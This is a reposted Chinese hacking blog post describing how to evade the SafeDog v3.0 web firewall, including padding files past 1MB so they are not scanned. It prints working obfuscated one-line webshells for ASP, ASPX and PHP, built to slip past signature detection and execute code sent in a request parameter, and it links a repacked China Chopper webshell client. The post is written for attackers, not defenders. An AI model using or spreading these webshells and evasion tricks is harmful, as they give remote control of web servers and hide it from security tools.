最新消息:

对于脚本木马的免杀(特别针对安全狗的V3.0)的经验副过狗菜刀

别人经典渗透过程学习 admin 2166浏览 0评论

关于脚本木马的免杀(针对安全狗的V3.0)经验

安全狗3.0默认忽略大于1048576字节即1M的文件(如图)。

至于怎么把木马弄成大于1M,你应该懂的。

另外,脚本文件只是在初次请求时进行编译,如果没有修改的话是不会再次编译的。

简单来说就是,文件变大了只会影响第一次访问速度,不会影响之后的访问速度。

File

最后再发几张一直珍藏的图片娱乐一下:jpg.rar

只要你是个黑客,你就应该懂得这是什么,

安全的图片,哈哈

File

File

收费的东西装不起,只能拿几个免费的来试一下了。安全狗什么的是我的最爱啊~

密码?就算我不说密码是-7你也能一眼看出来的吧?(=^_^=)

里面的一句话是

asp和aspx都拆掉了request,但是eval始终拆不掉,残念

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%@ Page Language = Jscript %>
<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>

php倒是完全拆掉了(还是php自由度高)

夸一下~哈哈

<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

 

喔,顺便把我那把caidao也发一下吧

脱壳XXOO了之后,又加回了upx壳。。。版权什么的我也不知道怎么说了咳

daodao.rar

希望这些东西几个月后还没烂透

(=^_^=)

[原文地址]

相关内容:

简单绕过安全狗进行任何操作 让狗形同虚设

网爆安全狗存在远程溢出漏洞

实战这些年咬过我们的安全狗(总结篇)

看哥是怎么突破安全狗和360网站卫士的

破那个垃圾安全狗技术总汇

安全狗 iis 6.0 ; 截断解析突破

本文“对于脚本木马的免杀(特别针对安全狗的V3.0)的经验副过狗菜刀”,来自:Nuclear’Atk 网络安全研究中心,本文地址:http://lcx.cc/?i=3617,转载请注明作者及出处!

转载请注明:jinglingshu的博客 » 对于脚本木马的免杀(特别针对安全狗的V3.0)的经验副过狗菜刀

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (1)

  1. 过菜刀一句话的密码都是-7
    admin12年前 (2013-09-04)回复